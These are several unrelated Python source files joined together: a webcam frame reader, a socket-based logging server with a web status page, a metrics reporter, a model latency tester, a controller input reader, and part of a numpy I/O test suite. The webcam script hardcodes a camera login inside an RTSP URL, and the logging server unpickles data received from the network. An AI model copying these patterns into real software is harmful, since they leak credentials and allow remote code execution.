self._prev_t = time.time() - 1.0 / max_framerate
def read_image(self):
dt = time.time() - self._prev_t
if dt <= self._min_dt:
time.sleep(self._min_dt - dt)
self._prev_t = time.time()
image = self._imgs_queue.get(timeout=10.0)
return image
def has_image(self):
return True # The web camera always has new image
def stop(self):
self._is_thread_alive.value = False
self._video.release()
self._is_stoped = True
def __del__(self):
if not self._is_stoped:
self.stop()
def _thread_reading_webcam_images(self):
while self._is_thread_alive.value:
ret, image = self._video.read()
if self._imgs_queue.full(): # if queue is full, pop one
img_to_discard = self._imgs_queue.get(timeout=0.001)
self._imgs_queue.put(image, timeout=0.001) # push to queue
print("Web camera thread is dead.")
def select_images_loader(src_data_type, src_data_path):
if src_data_type == "webcam":
if src_data_path == "":
webcam_idx = 0
elif src_data_path.isdigit():
webcam_idx = int(src_data_path)
else:
webcam_idx = src_data_path
images_loader = ReadFromWebcam(
25, webcam_idx)
return images_loader
# class DetectFall():
# def __init__(self, label_save, window_size=32, time_save=180):
# self.window_size = window_size
# self.time_save = time_save
# self.time = -1
# self.label_save = label_save
# self.save_video = SaveImage(window_size=self.window_size*3)
# self.classifi = ClassifierOnTest(window_size=self.window_size)
# self.skeleton = SkeletonDetector()
def detect(images_loader):
# vs = cv2.VideoCapture(link_camera)
while images_loader.has_image():
frame = images_loader.read_image()
# (grabbed, frame) = vs.read()
# if not grabbed:
# break
cv2.imshow("demo",frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# sk = self.skeleton.detect(frame)
# self.save_video.add_image_for_video(frame)
# predict = self.classifi.predict(np.array(sk))
# print(predict)
# if predict==self.label_save:
# if self.time == -1:
# self.save_video.save_img2video('data/test.avi')
# self.time = int(time.time())
# elif int(time.time()) - self.time > self.time_save:
# self.save_video.save_img2video('data/test.avi')
# self.time = int(time.time())
if __name__ == "__main__":
# save_video = SaveImage(64)
# classi = ClassifierOnTest(window_size=32)
# skeleton = SkeletonDetector()
path_video = 'rtsp://admin:D9ng2612@192.168.1.180:554/cam/realmonitor?channel=1&subtype=1'
# frame_provider = ImageReader(images)
images_loader = select_images_loader('webcam', path_video)
# test_demo(net, 256, None, 1, 1, images_loader)
detect(images_loader)
# save_video.add_image_for_video(frame)
# save_video.save_img2video('test.avi')
|
recipe-577025.py
|
"""
LoggingWebMonitor - a central logging server and monitor.
Listens for log records sent from other processes running
in the same box or network. Collects and saves them
concurrently in a log file. Shows a summary web page with
the latest N records received.
Usage:
- Add a SocketHandler to your application::
from logging.handlers import SocketHandler, DEFAULT_TCP_LOGGING_PORT
socketh = SocketHandler(servername, DEFAULT_TCP_LOGGING_PORT)
logging.getLogger('').addHandler(socketh)
where servername is the host name of the logging server ('localhost'
if run on the same box)
- Start an instance of this script (the logging server).
This will open two listening sockets:
- one at DEFAULT_TCP_LOGGING_PORT (9020), listening for
logging events from your application
- a web server at DEFAULT_TCP_LOGGING_PORT+1 (9021),
showing a summary web page with the latest 200
log records received. That web page will be
opened by default, using your preferred web browser.
- You may add additional handlers or filters to this script;
see fileHandler below.
- Note that several separate processes *cannot* write to the same
logging file; this script avoids that problem, providing
the necesary isolation level.
- If you customize the logging system here, make sure `mostrecent`
(instance of MostRecentHandler) remains attached to the root logger.
Author: Gabriel A. Genellina, based on code from Vinay Sajip and
doug.farrell
This has been tested with Python versions 2.3 thru 2.6; on versions
older than 2.5, Ctrl-C handling and the stack trace may not work
as expected.
"""
import os
import sys
import cPickle
import logging
import logging.handlers
import SocketServer
import BaseHTTPServer
import struct
import threading
import datetime
import cgi
import time
try:
from collections import deque
except ImportError:
# pre 2.5
class deque(list):
def popleft(self):
elem = self.pop(0)
return elem
try:
reversed
except NameError:
# pre 2.4
def reversed(items):
return items[::-1]
class MostRecentHandler(logging.Handler):
'A Handler which keeps the most recent logging records in memory.'
def __init__(self, max_records=200):
logging.Handler.__init__(self)
self.logrecordstotal = 0
self.max_records = max_records
try:
self.db = deque([], max_records)
except TypeError:
# pre 2.6
self.db = deque([])
def emit(self, record):
self.logrecordstotal += 1
try:
self.db.append(record)
# pre 2.6
while len(self.db)>self.max_records:
self.db.popleft()
except Exception:
self.handleError(record)
# taken from the logging package documentation by Vinay Sajip
class LogRecordStreamHandler(SocketServer.StreamRequestHandler):
'Handler for a streaming logging request'
def handle(self):
'''
Handle multiple requests - each expected to be a 4-byte length,
followed by the LogRecord in pickle format.
'''
while 1:
chunk = self.connection.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack('>L', chunk)[0]
chunk = self.connection.recv(slen)
while len(chunk) < slen:
chunk = chunk + self.connection.recv(slen - len(chunk))
obj = self.unPickle(chunk)
record = logging.makeLogRecord(obj)
self.handleLogRecord(record)
def unPickle(self, data):
return cPickle.loads(data)
def handleLogRecord(self, record):
# if a name is specified, we use the named logger rather than the one
# implied by the record.
if self.server.logname is not None:
name = self.server.logname
else:
name = record.name
logger = logging.getLogger(name)
# N.B. EVERY record gets logged. This is because Logger.handle
# is normally called AFTER logger-level filtering. If you want
# to do filtering, do it at the client end to save wasting
# cycles and network bandwidth!
logger.handle(record)
class LoggingReceiver(SocketServer.ThreadingTCPServer):
'Simple TCP socket-based logging receiver'
logname = None
def __init__(self, host='localhost',
port=None,
handler=LogRecordStreamHandler):
if port is None:
port = logging.handlers.DEFAULT_TCP_LOGGING_PORT
SocketServer.ThreadingTCPServer.__init__(self, (host, port), handler)
# idea and page layout taken from python-loggingserver by doug.farrell
# http://code.google.com/p/python-loggingserver/
class LogginWebMonitorRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
datefmt = '%Y-%m-%d %H:%M:%S'
formatter = logging.Formatter(
fmt='%(asctime)s\n%(name)s\n%(levelname)s\n%(funcName)s (%(filename)s:%(lineno)d)\n%(message)s',
datefmt=datefmt)
default_css = """\
body {
font-family: verdana, arial, helvetica, sans-serif;
}
table {
margin-left: auto;
margin-right: auto;
width: 100%;
border: 1px solid black;
margin-top: 3ex;
}
table caption {
/*font-weight: bold;*/
text-align: center;
font-size: larger;
margin-bottom: 0.5ex;
}
tr {
font-family: "Lucida Console", monospace;
}
th, td {
padding: 0.5ex;
}
tr.critical {
background-color: red;
color: yellow;
text-decoration: blink;
}
tr.error {
background-color: #ff3300; /* red */
color: yellow;
}
tr.warn, tr.warning {
background-color: #ffff99; /* yellow */
color: black;
}
tr.info, td.info {
background-color: #90EE90; /* lightgreen */
color: black;
}
tr.debug {
background-color: #7FFFD4; /* aquamarine */
color: black;
}
table.vtable tr th {
font-weight: bold;
text-align: right;
}
table.htable tr th {
font-weight: bold;
text-align: center;
}
table.htable tr.heading,
table.vtable tr th.heading {
background-color: #E0E0E0;
}
"""
summary_html = """\
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=iso-8859-1">
<meta http-equiv="refresh" content="5">
<title>Logging Server Status Page</title>
<link rel="stylesheet" type="text/css" href="/default.css">
</head>
<body>
<table class="vtable">
<caption>Logging Server Status Page</caption>
<tr>
<th class="heading">Logging Server Start Time</th>
<td class="info">%(starttime)s</td>
</tr>
<tr>
<th class="heading">Logging Server Up Time</th>
<td class="info">%(uptime)s</td>
</tr>
<tr>
<th class="heading">Log Records Total</th>
<td class="info">%(logrecordstotal)s</td>
</tr>
</table>
<table class="htable">
<caption>Most Recent Log Records</caption>
<tr class="heading"><th>Date</th><th>Channel</th><th>Level</th><th>Location</th><th>Message</th></tr>
%(records)s
</table>
<p style="text-align:right">
<a href="http://jigsaw.w3.org/css-validator/check/referer">
<img style="border:0;width:88px;height:31px"
src="http://jigsaw.w3.org/css-validator/images/vcss"
alt="Valid CSS">
</a>
<a href="http://validator.w3.org/check?uri=referer"><img
src="http://www.w3.org/Icons/valid-html401"
alt="Valid HTML 4.01 Strict" height="31" width="88"></a>
</p>
</body>
</html>
"""
def do_GET(self):
'Serve a GET request.'
sts, response, type = self.build_response(self.path)
self.send_response(sts)
if sts==301:
self.send_header('Location', response)
if type:
self.send_header('Content-type', type)
self.send_header('Content-Length', str(len(response)))
self.end_headers()
if response:
self.wfile.write(response)
def build_response(self, path):
try:
if path == '/summary.html':
return 200, self.summary_page(), 'text/html'
if path == '/default.css':
return 200, self.default_css, 'text/css'
if path == '/':
return 301, '/summary.html', 'text/html'
return 404, None, None
except Exception:
import traceback
print >>sys.stderr, 'While handling %r:' % path
traceback.print_exc(file=sys.stderr)
return 500, None, None
def summary_page(self):
escape = cgi.escape
mostrecent = self.server.mostrecent
starttime = escape(self.server.starttime.strftime(self.datefmt))
uptime = datetime.datetime.now() - self.server.starttime
uptime = escape(str(datetime.timedelta(uptime.days, uptime.seconds)))
logrecordstotal = escape(str(mostrecent.logrecordstotal))
formatter = self.formatter
items = []
for record in reversed(list(mostrecent.db)):
try:
cells = escape(formatter.format(record)).split('\n', 4)
cells = ['<td>%s</td>' % cell for cell in cells]
cells[-1] = cells[-1].replace('\n', '<br>\n') # message & stack trace
items.append('<tr class="%s">%s\n</tr>' %
(escape(record.levelname.lower()), ''.join(cells)))
except Exception:
import traceback
print >>sys.stderr, 'While generating %r:' % record
traceback.print_exc(file=sys.stderr)
records = '\n'.join(items)
d = dict(starttime=starttime,
uptime=uptime,
logrecordstotal=logrecordstotal,
records=records)
return self.summary_html % d
def log_message(self, format, *args):
pass
class LoggingWebMonitor(BaseHTTPServer.HTTPServer):
'A simple web page for displaying logging records'
def __init__(self, host='localhost',
port=None,
handler=LogginWebMonitorRequestHandler):
if port is None:
port = logging.handlers.DEFAULT_TCP_LOGGING_PORT + 1
BaseHTTPServer.HTTPServer.__init__(self, (host, port), handler)
self.starttime = datetime.datetime.now()
if not hasattr(SocketServer.TCPServer, 'shutdown'):
# pre 2.6
_original_get_request = SocketServer.TCPServer.get_request
def serve_forever(self):
while not self.quit:
self.handle_request()
def shutdown(self):
self.quit = True
def get_request(self):
self.socket.settimeout(30)
request, client_address = _original_get_request(self)
request.settimeout(30)
return request, client_address
for cls in (LoggingReceiver, LoggingWebMonitor):
cls.serve_forever = serve_forever
cls.shutdown = shutdown
cls.get_request = get_request
cls.quit = False
def main():
mostrecent = MostRecentHandler()
rootLogger = logging.getLogger('')
rootLogger.setLevel(logging.DEBUG)
rootLogger.addHandler(mostrecent)
## You may add additional handlers like this FileHandler
## that logs every message to a file
## named after this module name, with extension .log
#
#formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')
#fileHandler = logging.FileHandler(os.path.splitext(__file__)[0] + '.log')
#fileHandler.setFormatter(formatter)
#rootLogger.addHandler(fileHandler)
webmonitor = LoggingWebMonitor()
webmonitor.mostrecent = mostrecent
thr_webmonitor = threading.Thread(target=webmonitor.serve_forever)
thr_webmonitor.daemon = True
print '%s started at %s' % (webmonitor.__class__.__name__, webmonitor.server_address)
thr_webmonitor.start()
recv = LoggingReceiver()
thr_recv = threading.Thread(target=recv.serve_forever)
thr_recv.daemon = True
print '%s started at %s' % (recv.__class__.__name__, recv.server_address)
thr_recv.start()
import webbrowser
webbrowser.open('http://%s:%s/' % webmonitor.server_address)
while True:
try: time.sleep(3600)
except (KeyboardInterrupt, SystemExit):
recv.shutdown()
webmonitor.shutdown()
break
return 0
if __name__ == '__main__':
sys.exit(main())
|
reporter.py
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making ่้ฒธๆบไบPaaSๅนณๅฐ็คพๅบ็ (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
import time
import logging
import threading
from typing import Optional
import requests
from prometheus_client import (
REGISTRY,
CollectorRegistry,
generate_latest,
)
from prometheus_client.parser import text_string_to_metric_families
logger = logging.getLogger("bk-monitor-report")
class MonitorReporter:
def __init__(
self,
data_id: int,
access_token: str,
target: str,
url: str,
report_interval: int = 60,
registry: Optional[CollectorRegistry] = REGISTRY,
):
"""
:param data_id: ็ๆง Data ID
:param access_token: ่ชๅฎไนไธๆฅ Token
:param target: ไธๆฅๅฏไธๆ ๅฟ็ฌฆ
:param url: ไธๆฅๅฐๅ
:param report_interval: ๅจๆๆงไธๆฅ้ด้๏ผๅไฝไธบ็ง, defaults to 60
:param registry: promethues ๆๆ ่ทๅๆฅๆบ, defaults to REGISTRY
"""
self.data_id = data_id
self.access_token = access_token
self.target = target
self.url = url
self.registry = registry
self.report_interval = report_interval
self._report_thread = None
def generate_report_data(self):
data = {"data_id": self.data_id, "access_token": self.access_token, "data": []}
timestamp = round(time.time() * 1000)
metrics_text = generate_latest(self.registry).decode("utf-8")
for family in text_string_to_metric_families(metrics_text):
for sample in family.samples:
data["data"].append(
{
"metrics": {sample.name: sample.value},
"target": self.target,
"dimension": sample.labels,
"timestamp": timestamp,
}
)
return data
def report(self):
data = self.generate_report_data()
try:
resp = requests.post(self.url, json=data)
except Exception:
logger.exception("[MonitorReporter]data({}) report to {} failed".format(data, self.url))
return
if not resp.ok:
logger.error("[MonitorReporter]data({}) report to {} failed, resp: {}".format(data, self.url, resp.text))
logger.info("[MonitorReporter]report finish: {}".format(resp.text))
def _periodic_report_helper(self):
report_start_time = time.perf_counter()
try:
self.report()
except Exception:
logger.exception("[MonitorReporter]periodic report to {} failed".format(self.url))
report_cost = time.perf_counter() - report_start_time
logger.exception("[MonitorReporter]periodic report cost {}s".format(report_cost))
sleep_interval = self.report_interval - report_cost
if sleep_interval > 0:
time.sleep(sleep_interval)
def _periodic_report(self):
while True:
self._periodic_report_helper()
def start(self):
if self._report_thread is not None:
logger.warning("[MonitorReporter]reporter already started")
return
self.thread = threading.Thread(target=self._periodic_report, daemon=True)
self.thread.start()
|
test_net.py
|
from utils.logger import Writer
import threading
import torch
from torchstat import stat
import time
from path import Path
class TestNet():
def __init__(self,running_on,dev,name,height,width):
super(TestNet, self).__init__()
self.running_on = running_on
self.device = torch.device(dev)
self.feed_width = width
self.feed_height = height
self.onnx_dir = Path("./onnxs")
self.onnx_dir.mkdir_p()
self.duration = 1
self.writer = Writer()
self.duration = 1
self.out_width = 640
self.out_height = 480
self.network=None
self.name=name
# self.network = networks.ResNet(layers=18, decoder='nnconv5', output_size=[self.feed_width, self.feed_height]).to(
# self.device)
self.duration_en = 1
self.duration_de = 1
self.duration = 1
def infer(self,input):
torch.cuda.synchronize(self.device)
t1 = time.time()
features = self.encoder(input)
# disp = self.depth_decoder(features)
torch.cuda.synchronize(self.device)
t2 = time.time()
disp = self.decoder(features)
torch.cuda.synchronize(self.device)
t3 = time.time()
self.duration_en = t2 - t1
self.duration_de = t3 - t2
self.duration = t3 - t1
return disp
def Test(self):
th2 = threading.Thread(target=self.fps)
th2.start()
example_inputs = torch.rand(1, 3, self.feed_height, self.feed_width).to(self.device)
while True:
try:
##infer
disp = self.infer(example_inputs)
except KeyboardInterrupt:
return
def fps(self):
while True:
time.sleep(1.1)
self.writer.write("encoder: {:.2f} ms\ndecoder: {:.2f}ms\ntotal: {:.2f}ms\n".format(self.duration_en*1000,self.duration_de*1000,self.duration*1000), location=(0, 5))
def onnx_out(self):
example_inputs = torch.rand(1, 3, 224, 224) # bs is not matter for latency
output = torch.onnx.export(model=self.network,
args=example_inputs,
f=self.onnx_dir / self.name+".onnx",
# output_names=['f0','f1','f2','f3','f4'],
verbose=True,
export_params=True # ๅธฆๅๆฐ่พๅบ
)
def torch_stat(self):
stat(self.encoder.to('cpu'), input_size=(3, self.feed_width, self.feed_height))
|
output.py
|
# ---------------------------------------------------------------------------
# Console output for MTDA
# ---------------------------------------------------------------------------
#
# This software is a part of MTDA.
# Copyright (c) Mentor, a Siemens business, 2017-2020
#
# ---------------------------------------------------------------------------
# SPDX-License-Identifier: MIT
# ---------------------------------------------------------------------------
# System imports
import os
import sys
import threading
class ConsoleOutput:
def __init__(self):
self.rx_alive = False
self.rx_thread = None
def start(self):
self.rx_alive = True
self.rx_thread = threading.Thread(
target=self.reader, name='console_rx')
self.rx_thread.daemon = True
self.rx_thread.start()
def reader(self):
return None
|
xbox.py
|
import subprocess
import threading
class XBox(object):
def __init__(self, wireless_index=0):
self.wireless_index = wireless_index
self.value = dict(X1=0, Y1=0, X2=0, Y2=0, LT=0, RT=0,
du=0, dd=0, dl=0, dr=0,
back=0, guide=0, start=0,
A=0, B=0, X=0, Y=0, LB=0, RB=0)
def start(self):
threading.Thread(target=self.run, args=()).start()
def run(self):
p = subprocess.Popen(['xboxdrv', '-w', '%d' % self.wireless_index],
stdout=subprocess.PIPE)
while True:
line = p.stdout.readline().strip().decode('utf-8')
#print(line)
if line.startswith('X1'):
self.parse(line)
def parse(self, line):
data = line.replace(':', ': ').split()
tag = None
for item in data:
if item.endswith(':'):
tag = item[:-1]
else:
value = int(item)
self.value[tag] = value
if __name__ == '__main__':
import time
x = XBox()
x.start()
while True:
print(x.value)
time.sleep(0.01)
|
test_io.py
|
from __future__ import division, absolute_import, print_function
import sys
import gzip
import os
import threading
from tempfile import mkstemp, mktemp, NamedTemporaryFile
import time
import warnings
import gc
from io import BytesIO
from datetime import datetime
import numpy as np
import numpy.ma as ma
from numpy.lib._iotools import (ConverterError, ConverterLockError,
ConversionWarning)
from numpy.compat import asbytes, asbytes_nested, bytes, asstr
from nose import SkipTest
from numpy.ma.testutils import (TestCase, assert_equal, assert_array_equal,
assert_raises, run_module_suite)
from numpy.testing import assert_warns, assert_, build_err_msg
class TextIO(BytesIO):
"""Helper IO class.
Writes encode strings to bytes if needed, reads return bytes.
This makes it easier to emulate files opened in binary mode
without needing to explicitly convert strings to bytes in
setting up the test data.
"""
def __init__(self, s=""):
BytesIO.__init__(self, asbytes(s))
def write(self, s):
BytesIO.write(self, asbytes(s))
def writelines(self, lines):
BytesIO.writelines(self, [asbytes(s) for s in lines])
MAJVER, MINVER = sys.version_info[:2]
IS_64BIT = sys.maxsize > 2**32
def strptime(s, fmt=None):
"""This function is available in the datetime module only
from Python >= 2.5.
"""
if sys.version_info[0] >= 3:
return datetime(*time.strptime(s.decode('latin1'), fmt)[:3])
else:
return datetime(*time.strptime(s, fmt)[:3])
class RoundtripTest(object):
def roundtrip(self, save_func, *args, **kwargs):
"""
save_func : callable
Function used to save arrays to file.
file_on_disk : bool
If true, store the file on disk, instead of in a
string buffer.
save_kwds : dict
Parameters passed to `save_func`.
load_kwds : dict
Parameters passed to `numpy.load`.
args : tuple of arrays
Arrays stored to file.
"""
save_kwds = kwargs.get('save_kwds', {})
load_kwds = kwargs.get('load_kwds', {})
file_on_disk = kwargs.get('file_on_disk', False)
if file_on_disk:
# Do not delete the file on windows, because we can't
# reopen an already opened file on that platform, so we
# need to close the file and reopen it, implying no
# automatic deletion.
if sys.platform == 'win32' and MAJVER >= 2 and MINVER >= 6:
target_file = NamedTemporaryFile(delete=False)
else:
target_file = NamedTemporaryFile()
load_file = target_file.name
else:
target_file = BytesIO()
load_file = target_file
arr = args
save_func(target_file, *arr, **save_kwds)
target_file.flush()
target_file.seek(0)
if sys.platform == 'win32' and not isinstance(target_file, BytesIO):
target_file.close()
arr_reloaded = np.load(load_file, **load_kwds)
self.arr = arr
self.arr_reloaded = arr_reloaded
def check_roundtrips(self, a):
self.roundtrip(a)
self.roundtrip(a, file_on_disk=True)
self.roundtrip(np.asfortranarray(a))
self.roundtrip(np.asfortranarray(a), file_on_disk=True)
if a.shape[0] > 1:
# neither C nor Fortran contiguous for 2D arrays or more
self.roundtrip(np.asfortranarray(a)[1:])
self.roundtrip(np.asfortranarray(a)[1:], file_on_disk=True)
def test_array(self):
a = np.array([], float)
self.check_roundtrips(a)
a = np.array([[1, 2], [3, 4]], float)
self.check_roundtrips(a)
a = np.array([[1, 2], [3, 4]], int)
self.check_roundtrips(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.csingle)
self.check_roundtrips(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.cdouble)
self.check_roundtrips(a)
def test_array_object(self):
if sys.version_info[:2] >= (2, 7):
a = np.array([], object)
self.check_roundtrips(a)
a = np.array([[1, 2], [3, 4]], object)
self.check_roundtrips(a)
# Fails with UnpicklingError: could not find MARK on Python 2.6
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
self.roundtrip(a)
@np.testing.dec.knownfailureif(sys.platform == 'win32', "Fail on Win32")
def test_mmap(self):
a = np.array([[1, 2.5], [4, 7.3]])
self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
a = np.asfortranarray([[1, 2.5], [4, 7.3]])
self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
self.check_roundtrips(a)
class TestSaveLoad(RoundtripTest, TestCase):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.save, *args, **kwargs)
assert_equal(self.arr[0], self.arr_reloaded)
assert_equal(self.arr[0].dtype, self.arr_reloaded.dtype)
assert_equal(self.arr[0].flags.fnc, self.arr_reloaded.flags.fnc)
class TestSavezLoad(RoundtripTest, TestCase):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.savez, *args, **kwargs)
for n, arr in enumerate(self.arr):
reloaded = self.arr_reloaded['arr_%d' % n]
assert_equal(arr, reloaded)
assert_equal(arr.dtype, reloaded.dtype)
assert_equal(arr.flags.fnc, reloaded.flags.fnc)
@np.testing.dec.skipif(not IS_64BIT, "Works only with 64bit systems")
@np.testing.dec.slow
def test_big_arrays(self):
L = (1 << 31) + 100000
tmp = mktemp(suffix='.npz')
a = np.empty(L, dtype=np.uint8)
np.savez(tmp, a=a)
del a
npfile = np.load(tmp)
a = npfile['a']
npfile.close()
os.remove(tmp)
def test_multiple_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
self.roundtrip(a, b)
def test_named_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
c = BytesIO()
np.savez(c, file_a=a, file_b=b)
c.seek(0)
l = np.load(c)
assert_equal(a, l['file_a'])
assert_equal(b, l['file_b'])
def test_savez_filename_clashes(self):
# Test that issue #852 is fixed
# and savez functions in multithreaded environment
def writer(error_list):
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
try:
arr = np.random.randn(500, 500)
try:
np.savez(tmp, arr=arr)
except OSError as err:
error_list.append(err)
finally:
os.remove(tmp)
errors = []
threads = [threading.Thread(target=writer, args=(errors,))
for j in range(3)]
for t in threads:
t.start()
for t in threads:
t.join()
if errors:
raise AssertionError(errors)
def test_not_closing_opened_fid(self):
# Test that issue #2178 is fixed:
# verify could seek on 'loaded' file
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
try:
fp = open(tmp, 'wb')
np.savez(fp, data='LOVELY LOAD')
fp.close()
fp = open(tmp, 'rb', 10000)
fp.seek(0)
assert_(not fp.closed)
_ = np.load(fp)['data']
assert_(not fp.closed)
# must not get closed by .load(opened fp)
fp.seek(0)
assert_(not fp.closed)
finally:
fp.close()
os.remove(tmp)
def test_closing_fid(self):
# Test that issue #1517 (too many opened files) remains closed
# It might be a "weak" test since failed to get triggered on
# e.g. Debian sid of 2012 Jul 05 but was reported to
# trigger the failure on Ubuntu 10.04:
# http://projects.scipy.org/numpy/ticket/1517#comment:2
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
try:
fp = open(tmp, 'wb')
np.savez(fp, data='LOVELY LOAD')
fp.close()
# We need to check if the garbage collector can properly close
# numpy npz file returned by np.load when their reference count
# goes to zero. Python 3 running in debug mode raises a
# ResourceWarning when file closing is left to the garbage
# collector, so we catch the warnings. Because ResourceWarning
# is unknown in Python < 3.x, we take the easy way out and
# catch all warnings.
with warnings.catch_warnings():
warnings.simplefilter("ignore")
for i in range(1, 1025):
try:
np.load(tmp)["data"]
except Exception as e:
msg = "Failed to load data from a file: %s" % e
raise AssertionError(msg)
finally:
os.remove(tmp)
def test_closing_zipfile_after_load(self):
# Check that zipfile owns file and can close it.
# This needs to pass a file name to load for the
# test.
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
np.savez(tmp, lab='place holder')
data = np.load(tmp)
fp = data.zip.fp
data.close()
assert_(fp.closed)
class TestSaveTxt(TestCase):
def test_array(self):
a = np.array([[1, 2], [3, 4]], float)
fmt = "%.18e"
c = BytesIO()
np.savetxt(c, a, fmt=fmt)
c.seek(0)
assert_equal(c.readlines(),
[asbytes((fmt + ' ' + fmt + '\n') % (1, 2)),
asbytes((fmt + ' ' + fmt + '\n') % (3, 4))])
a = np.array([[1, 2], [3, 4]], int)
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 2\n', b'3 4\n'])
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'1\n', b'2\n', b'3\n', b'4\n'])
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 2\n', b'3 4\n'])
def test_delimiter(self):
a = np.array([[1., 2.], [3., 4.]])
c = BytesIO()
np.savetxt(c, a, delimiter=',', fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1,2\n', b'3,4\n'])
def test_format(self):
a = np.array([(1, 2), (3, 4)])
c = BytesIO()
# Sequence of formats
np.savetxt(c, a, fmt=['%02d', '%3.1f'])
c.seek(0)
assert_equal(c.readlines(), [b'01 2.0\n', b'03 4.0\n'])
# A single multiformat string
c = BytesIO()
np.savetxt(c, a, fmt='%02d : %3.1f')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])
# Specify delimiter, should be overiden
c = BytesIO()
np.savetxt(c, a, fmt='%02d : %3.1f', delimiter=',')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])
# Bad fmt, should raise a ValueError
c = BytesIO()
assert_raises(ValueError, np.savetxt, c, a, fmt=99)
def test_header_footer(self):
"""
Test the functionality of the header and footer keyword argument.
"""
c = BytesIO()
a = np.array([(1, 2), (3, 4)], dtype=np.int)
test_header_footer = 'Test header / footer'
# Test the header keyword argument
np.savetxt(c, a, fmt='%1d', header=test_header_footer)
c.seek(0)
assert_equal(c.read(),
asbytes('# ' + test_header_footer + '\n1 2\n3 4\n'))
# Test the footer keyword argument
c = BytesIO()
np.savetxt(c, a, fmt='%1d', footer=test_header_footer)
c.seek(0)
assert_equal(c.read(),
asbytes('1 2\n3 4\n# ' + test_header_footer + '\n'))
# Test the commentstr keyword argument used on the header
c = BytesIO()
commentstr = '% '
np.savetxt(c, a, fmt='%1d',
header=test_header_footer, comments=commentstr)
c.seek(0)
assert_equal(c.read(),
asbytes(commentstr + test_header_footer + '\n' + '1 2\n3 4\n'))
# Test the commentstr keyword argument used on the footer
c = BytesIO()
commentstr = '% '
np.savetxt(c, a, fmt='%1d',
footer=test_header_footer, comments=commentstr)
c.seek(0)
assert_equal(c.read(),
asbytes('1 2\n3 4\n' + commentstr + test_header_footer + '\n'))
def test_file_roundtrip(self):
f, name = mkstemp()
os.close(f)
try:
a = np.array([(1, 2), (3, 4)])
np.savetxt(name, a)
b = np.loadtxt(name)
assert_array_equal(a, b)
finally:
os.unlink(name)
def test_complex_arrays(self):
ncols = 2
nrows = 2
a = np.zeros((ncols, nrows), dtype=np.complex128)
re = np.pi
im = np.e
a[:] = re + 1.0j * im
# One format only
c = BytesIO()
np.savetxt(c, a, fmt=' %+.3e')
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n',
b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n'])
# One format for each real and imaginary part
c = BytesIO()
np.savetxt(c, a, fmt=' %+.3e' * 2 * ncols)
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n',
b' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n'])
# One format for each complex number
c = BytesIO()
np.savetxt(c, a, fmt=['(%.3e%+.3ej)'] * ncols)
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n',
b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n'])
def test_custom_writer(self):
class CustomWriter(list):
def write(self, text):
self.extend(text.split(b'\n'))
w = CustomWriter()
a = np.array([(1, 2), (3, 4)])
np.savetxt(w, a)
b = np.loadtxt(w)
assert_array_equal(a, b)
class TestLoadTxt(TestCase):
def test_record(self):
c = TextIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=[('x', np.int32), ('y', np.int32)])
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_array_equal(x, a)
d = TextIO()
d.write('M 64.0 75.0\nF 25.0 60.0')
d.seek(0)
mydescriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1', 'i4', 'f4')}
